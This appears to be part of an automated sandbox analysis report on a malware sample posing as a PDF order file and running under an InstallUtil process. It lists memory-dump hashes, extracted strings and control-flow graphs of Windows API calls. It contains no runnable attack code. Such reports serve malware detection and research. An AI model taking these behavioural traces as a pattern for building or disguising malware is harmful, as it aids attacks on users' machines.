                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8f9fdc08b62e63feb2afc123b6983d5a03d1a1c1ef10c9f3db92e6c3be902b39
                                                                                • Instruction ID: 54869a895d57a0a22f75468f68ab6d3dea26dad4925cc34abd1d4b6f4a12150d
                                                                                • Opcode Fuzzy Hash: 8f9fdc08b62e63feb2afc123b6983d5a03d1a1c1ef10c9f3db92e6c3be902b39
                                                                                • Instruction Fuzzy Hash: 37E08674909118EFC704DF94E941AADBFB8AB45311F24C0E9E94857341C6319E55EB94
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2ec6626a709dec7b23effa88f26d2e8fb0bcd4573991605a4fc99b56e9ce1738
                                                                                • Instruction ID: 0a66cab4dda35f130ed9e221227bbbf62de690d7e241d0ec19aacb6f6f0b89ba
                                                                                • Opcode Fuzzy Hash: 2ec6626a709dec7b23effa88f26d2e8fb0bcd4573991605a4fc99b56e9ce1738
                                                                                • Instruction Fuzzy Hash: EEE01A74D05208EFCB04DF98D5446ACFBB8EB48314F20C0BEDC4467351D6329A55EB85
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 19f5b8bc7ae0930de643f20060bb94d44af5e8e8dc7e718c9776063b8aa1f82e
                                                                                • Instruction ID: 281ff42dce6033f47055228b9977631a937b210d6fe2c230fc497b5a37a86e7c
                                                                                • Opcode Fuzzy Hash: 19f5b8bc7ae0930de643f20060bb94d44af5e8e8dc7e718c9776063b8aa1f82e
                                                                                • Instruction Fuzzy Hash: F5E0CD34906108DBC704DFA8D9415BCBF75EB45314F208199D80453341C7316D41D791
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9ebb1cda51e8aad00d2e5ac2a7d00aa5628cc15bea8d400bd75026662d128619
                                                                                • Instruction ID: f913ab0e5456fdd876ff061ba9d8e0dd2a7fed227c0e5f7e14b1dd357f6826a4
                                                                                • Opcode Fuzzy Hash: 9ebb1cda51e8aad00d2e5ac2a7d00aa5628cc15bea8d400bd75026662d128619
                                                                                • Instruction Fuzzy Hash: 1AE08634957108EFC704DF94D5C59ACBB74EB45304F109599CC0453352D671AE92DB81
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 90f6b2a240aa74d4191db160855245ac2288deea9bb94204258c2d3462bbd890
                                                                                • Instruction ID: c33186657d536c635c787258a483c84b314fe2f336328bc17ec6e8455823c4a5
                                                                                • Opcode Fuzzy Hash: 90f6b2a240aa74d4191db160855245ac2288deea9bb94204258c2d3462bbd890
                                                                                • Instruction Fuzzy Hash: E3E04F7564934C9FCB46CF54E9A89FD7BA3BF4B350F104444D8069B359CA316942AB42
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 59c786b8dc8137f0aff5537960b7e9f1aa322d96d210ac19bcc5f77b2932af49
                                                                                • Instruction ID: 91f8379d1d323387bcf3ee160dd30bdd3449cdbbda02cd6d3829449cf6433ca1
                                                                                • Opcode Fuzzy Hash: 59c786b8dc8137f0aff5537960b7e9f1aa322d96d210ac19bcc5f77b2932af49
                                                                                • Instruction Fuzzy Hash: A5E04F74D15108EFC704DF98D5446ACFBB4EB49304F10C1EAD85953351C632AE45DF40
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 59c786b8dc8137f0aff5537960b7e9f1aa322d96d210ac19bcc5f77b2932af49
                                                                                • Instruction ID: efe3227a9e56a2af80ee48e362decb87dda808bb34be3fcd281a44f19e154ddf
                                                                                • Opcode Fuzzy Hash: 59c786b8dc8137f0aff5537960b7e9f1aa322d96d210ac19bcc5f77b2932af49
                                                                                • Instruction Fuzzy Hash: A4E04FB4D19208EFC704DF98D5406ACFBB4EB89305F24C0EADC1953391C6319E41DB44
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction ID: 363a6016795b44d86adaedd615cbcb23efbe1991713372477522174a6fe3fc9a
                                                                                • Opcode Fuzzy Hash: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction Fuzzy Hash: B6E0C238A0A108DBC704EF94D9806ACBBB8EB45304F2085EDC80863341CA32AE42EB95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction ID: d40542a0151e28c3cc1f818f6f12d8fb8cf2d9221aefbbc3f217ba42f9226cf6
                                                                                • Opcode Fuzzy Hash: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction Fuzzy Hash: A3E0123490A208DBCB04DF94D985AACBBB4FB45315F2085A9D81867391DA32BE52DB85
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction ID: 7b845b5cc6073b023fa263b3fc19964be53a9b52fc0c688e6c74ce0987247eda
                                                                                • Opcode Fuzzy Hash: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction Fuzzy Hash: 3BE0C23490A108DBC704DF94D980AACBBB8FB49304F20C5DDC80967341CA32AE52DB80
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction ID: 23456aed34bba636e98c6241f202c0c51cdc31546b4edfb6ee1bf23c4181afe9
                                                                                • Opcode Fuzzy Hash: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction Fuzzy Hash: 9BE01234D0A108DBC704DF94E9856ACBBB8EB45319F2085DDD80867351DB32BE52DB85
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction ID: 530214555af11a2f1bbe76b2cbb3cfe106ef52a290e49dd2b74c27d5d4f3a656
                                                                                • Opcode Fuzzy Hash: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction Fuzzy Hash: 79E0C23490A108DBC704DFA8D9806BCBFB5EB46314F20819AC80863341C732AE42DB80
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction ID: 56ab2d802168229235a5aac617d622ded1723a8e9206b40cc3018d395aef7954
                                                                                • Opcode Fuzzy Hash: a41b5faf59905f34ad47428a36e99e6e9b3f7f3109067d9d9e8575cfcc488a13
                                                                                • Instruction Fuzzy Hash: 60E0C23490A10CDBC708DF94D9806ACBBB8EB46319F20C19DDC0873381CA32AE52DB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode Fuzzy Hash: c7cacbfada3a8ee919f548913b286fc26b7aaae18e32173a340a73cf4b250eca
                                                                                • Instruction Fuzzy Hash: 9921E7B2D01A18ABEB18CF9BDC4479DBBF2BFC8304F08C66AD408AA254DB7519458F50
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aaa4da011924eee787fd9d6a5fa55d1c65fb01b18ef350a7fcd2965e781ca376
                                                                                • Instruction ID: cfe33d43f119dcda1cbb3155375ebaf49109b0cdaa22a9424473306dbac29ae0
                                                                                • Opcode Fuzzy Hash: aaa4da011924eee787fd9d6a5fa55d1c65fb01b18ef350a7fcd2965e781ca376
                                                                                • Instruction Fuzzy Hash: 8821A3B2E01618DBEB18CF9BD8447DDFAF6BFC8314F18C56AD408AA254DB7419458F50
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f2c034435d81a1f273e54ceb44e5e47cec280bb644ca8ea5c0c5434a4358b58
                                                                                • Instruction ID: dba1fab184bc25a1693891db4c278f1b9a64a8affa4b22222de3c7080f1ebbda
                                                                                • Opcode Fuzzy Hash: 1f2c034435d81a1f273e54ceb44e5e47cec280bb644ca8ea5c0c5434a4358b58
                                                                                • Instruction Fuzzy Hash: DB21E1B1D14A19CBEB28CF2B8C54789F6F7AFC4301F04C1FA940CA6254EB700A858F55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJbq$TJbq$jjjjjj$$]q$$]q
                                                                                • API String ID: 0-480122481
                                                                                • Opcode ID: b0f95a97f37d30f97950ede02d3e5a89895e143eab9a59d03a18ec2aa977ed87
                                                                                • Instruction ID: a3bea4ca662b3038e0429683d97c9a6ca3714f2e8f92348e063986f98a10c195
                                                                                • Opcode Fuzzy Hash: b0f95a97f37d30f97950ede02d3e5a89895e143eab9a59d03a18ec2aa977ed87
                                                                                • Instruction Fuzzy Hash: 8DC08C0200E2A18F8B430B1810D12702F00AA62341328D491D0920A04BC1609982F221
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJbq$jjjjjj$$]q$$]q
                                                                                • API String ID: 0-2713803779
                                                                                • Opcode ID: 498b25cbef05cc9d011bc6416a14232ee356b39c04e563043087a267527bf62e
                                                                                • Instruction ID: ab206864a38f2126a3c6fd35d1edbfbe2a626353ad629ca98bfb963460bd0a64
                                                                                • Opcode Fuzzy Hash: 498b25cbef05cc9d011bc6416a14232ee356b39c04e563043087a267527bf62e
                                                                                • Instruction Fuzzy Hash: ECB012F2C17740DFC3008E108184740FBE0BF50617F0BC099C5040E043933CC156C644

                                                                                Execution Graph

                                                                                Execution Coverage:9.2%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:433
                                                                                Total number of Limit Nodes:34

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01807421
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID: U
                                                                                • API String ID: 2289755597-3372436214
                                                                                • Opcode ID: 5bfcee0eaad949addea84d60f5e49f4530882abb60a98fa79507633bccde611e
                                                                                • Instruction ID: f4cd2974aa9aee718dca8a2682928cec4bc71f89e0903be6fea29b1ec3dcc3ec
                                                                                • Opcode Fuzzy Hash: 5bfcee0eaad949addea84d60f5e49f4530882abb60a98fa79507633bccde611e
                                                                                • Instruction Fuzzy Hash: 004112B0C0061DCEDB25DFA9C884BCDBBF5BF49304F20806AD418AB254DB756A4ACF90

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d879805de92be979df53d3e33c03f022824c2c7e7f339f7bd3de19a83958eace
                                                                                • Instruction ID: 7117ab72a25d54e3b120339f7584bebb7682493c372a21ce0eb49074620dd1e6
                                                                                • Opcode Fuzzy Hash: d879805de92be979df53d3e33c03f022824c2c7e7f339f7bd3de19a83958eace
                                                                                • Instruction Fuzzy Hash: 8D819870A00B098FD765CF29D84475ABBF1FF88300F008A6DD54AD7A90DB35EA49CB91

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 0585DE91
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: EnumThreadWindows
                                                                                • String ID:
                                                                                • API String ID: 2941952884-0
                                                                                • Opcode ID: ae4e989d106da6a3df0af550266d7b4b248842af4f79cdf755f260b52a304e42
                                                                                • Instruction ID: 495e9e97a73384b8950c3d4a5cdfe4c4981c4d51d92a970aab848f60b8e1e20b
                                                                                • Opcode Fuzzy Hash: ae4e989d106da6a3df0af550266d7b4b248842af4f79cdf755f260b52a304e42
                                                                                • Instruction Fuzzy Hash: 8841CF71A052098FD714DF99C844BBEBBF6FF88320F14842AD919E7390CB789905CBA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 858 18063d4-1807431 CreateActCtxA 861 1807433-1807439 858->861 862 180743a-1807494 858->862 861->862 869 18074a3-18074a7 862->869 870 1807496-1807499 862->870 871 18074b8 869->871 872 18074a9-18074b5 869->872 870->869 873 18074b9 871->873 872->871 873->873
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01807421
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: cdf3677d58ad8f2473e71a0d39fc6280266b7c8f7bcfbafa526496c0e3f5c6c3
                                                                                • Instruction ID: 973b4156f42539834fd45fc19d9256e02d54640556773a5556f92b5cde15c8fc
                                                                                • Opcode Fuzzy Hash: cdf3677d58ad8f2473e71a0d39fc6280266b7c8f7bcfbafa526496c0e3f5c6c3
                                                                                • Instruction Fuzzy Hash: 554101B0C0061DCBDB25DFA9C884BDDBBF5BF49304F21806AD418AB254DB75694ACF90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 875 5854350-585438c 878 5854392-5854397 875->878 879 585443c-585445c 875->879 880 5854399-58543d0 878->880 881 58543ea-5854422 CallWindowProcW 878->881 885 585445f-585446c 879->885 888 58543d2-58543d8 880->888 889 58543d9-58543e8 880->889 882 5854424-585442a 881->882 883 585442b-585443a 881->883 882->883 883->885 888->889 889->885
                                                                                APIs
                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05854411
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: CallProcWindow
                                                                                • String ID:
                                                                                • API String ID: 2714655100-0
                                                                                • Opcode ID: b8661f45870eff3879300003841aeb9b05e99f86c403394359a812035429b672
                                                                                • Instruction ID: ef3d7bd22716b702be1850b61d3ae3fa0ad0e395c7dc2e6fcb734cf7e75a3657
                                                                                • Opcode Fuzzy Hash: b8661f45870eff3879300003841aeb9b05e99f86c403394359a812035429b672
                                                                                • Instruction Fuzzy Hash: 83410BB99002098FCB14DF99C448AAAFBF6FF89324F24C459D919A7321D775A845CFA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 891 585b190-585b1a2 892 585b1aa-585b1b5 891->892 893 585b1a5 call 5859d1c 891->893 894 585b1b7-585b1c7 call 585ac50 892->894 895 585b1ca-585b25c CreateIconFromResourceEx 892->895 893->892 900 585b265-585b282 895->900 901 585b25e-585b264 895->901 901->900
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFromIconResource
                                                                                • String ID:
                                                                                • API String ID: 3668623891-0
                                                                                • Opcode ID: ccabf77ec09067cf200429ea9fddc71d9364b9896878f05e0f83014c5f7c8ea1
                                                                                • Instruction ID: b899ec7266bec8b3f072a553371476d9fec2341f506c5a9b84981ff6c9e8b510
                                                                                • Opcode Fuzzy Hash: ccabf77ec09067cf200429ea9fddc71d9364b9896878f05e0f83014c5f7c8ea1
                                                                                • Instruction Fuzzy Hash: 403169729043489FCB11DFA9C844AEEBFF8EF09321F14805AE954E7261C3359854DBA1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 904 180611c-180681c DuplicateHandle 906 1806825-1806842 904->906 907 180681e-1806824 904->907 907->906
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0180674E,?,?,?,?,?), ref: 0180680F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: ec0c9cf313a72cd1ec88e4aec5edc20e43d1607963e53b2177ff0105b955051e
                                                                                • Instruction ID: dd499944a0a4be2a8fcf98b4f6076965607e1605ced6ba77ea1d87a37d1afca4
                                                                                • Opcode Fuzzy Hash: ec0c9cf313a72cd1ec88e4aec5edc20e43d1607963e53b2177ff0105b955051e
                                                                                • Instruction Fuzzy Hash: CA21E5B59002089FDB10CF9AD984ADEBFF8FB48310F14841AE918A7350D378AA54CFA1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 910 1806783 911 1806788-180681c DuplicateHandle 910->911 912 1806825-1806842 911->912 913 180681e-1806824 911->913 913->912
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0180674E,?,?,?,?,?), ref: 0180680F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 5df06f61b6692b80b9d62a4d3b7ce5114593e3bf5eca0928e7152e0128c1bc2c
                                                                                • Instruction ID: 64df1c5f655567f49d8eba89ac180606de3cf181216b2095ad7b2b4521b47b83
                                                                                • Opcode Fuzzy Hash: 5df06f61b6692b80b9d62a4d3b7ce5114593e3bf5eca0928e7152e0128c1bc2c
                                                                                • Instruction Fuzzy Hash: 0121E4B59002099FDB10CF9AD984ADEFFF8FB48310F14801AE918A3350D378AA54CFA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 916 585cd64-585de62 918 585de64-585de6c 916->918 919 585de6e-585de9e EnumThreadWindows 916->919 918->919 920 585dea7-585ded4 919->920 921 585dea0-585dea6 919->921 921->920
                                                                                APIs
                                                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 0585DE91
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: EnumThreadWindows
                                                                                • String ID:
                                                                                • API String ID: 2941952884-0
                                                                                • Opcode ID: 2866ba867ffef691f21059877390ab46c0ff98db187980932adf9161edddc5e5
                                                                                • Instruction ID: 6e7692ad0ebc7455d64ab6918abcbb9aa1069cb15edfa58a54aa0cbd1c4731ad
                                                                                • Opcode Fuzzy Hash: 2866ba867ffef691f21059877390ab46c0ff98db187980932adf9161edddc5e5
                                                                                • Instruction Fuzzy Hash: C52149759002098FDB14DF9AC844BEEFBF5FB98320F108429D959A3240D778A945CFA1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 925 5859d1c-585b25c CreateIconFromResourceEx 927 585b265-585b282 925->927 928 585b25e-585b264 925->928 928->927
                                                                                APIs
                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0585B1AA,?,?,?,?,?), ref: 0585B24F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFromIconResource
                                                                                • String ID:
                                                                                • API String ID: 3668623891-0
                                                                                • Opcode ID: b48332d6745d80f115dcaa8311c447a3537e0ea0280ceaa7aca2a8ee708e1a10
                                                                                • Instruction ID: 61bc625dbbc97078d1ca213094f3b266ff844f5517989e31856f0f026a68820d
                                                                                • Opcode Fuzzy Hash: b48332d6745d80f115dcaa8311c447a3537e0ea0280ceaa7aca2a8ee708e1a10
                                                                                • Instruction Fuzzy Hash: 53113AB580024D9FDB10DF9AC844BEEBFF8EB58321F14841AE955A7250C379A954CFA4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 931 5852010-5852012 932 5852014-5852016 931->932 933 5852019-5852082 SetWindowLongW 931->933 932->933 934 5852084-585208a 933->934 935 585208b-585209f 933->935 934->935
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?), ref: 05852075
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                • Opcode ID: 77a428ab8cb59afb68747b84cca729e63656dc37a3e6bda9f3c98bd3262ee3e2
                                                                                • Instruction ID: f154116250f481922e5f75e3b51ef071971b1b6620187d96360b6d09386b0cbc
                                                                                • Opcode Fuzzy Hash: 77a428ab8cb59afb68747b84cca729e63656dc37a3e6bda9f3c98bd3262ee3e2
                                                                                • Instruction Fuzzy Hash: EF1125B98002488FDB10DF99C585BDFBBF8EB49324F10841AD919A7240C379A944CFA1
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0180C25E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: cbbcd688dbf76e3fa181fea89369cfe60f0c8c73f5e5e8e56784464535111934
                                                                                • Instruction ID: 1b014fcbcc1534a1b453a0dd1ca6156f48b78fbb0f00289ce81e6e6c8893370a
                                                                                • Opcode Fuzzy Hash: cbbcd688dbf76e3fa181fea89369cfe60f0c8c73f5e5e8e56784464535111934
                                                                                • Instruction Fuzzy Hash: 0C1122B6C003498FDB10DF9AC844ADEFBF4EF89710F10856AD928A7650C379A645CFA1
                                                                                APIs
                                                                                • SendMessageW.USER32(?,?,?,?), ref: 0585B5AD
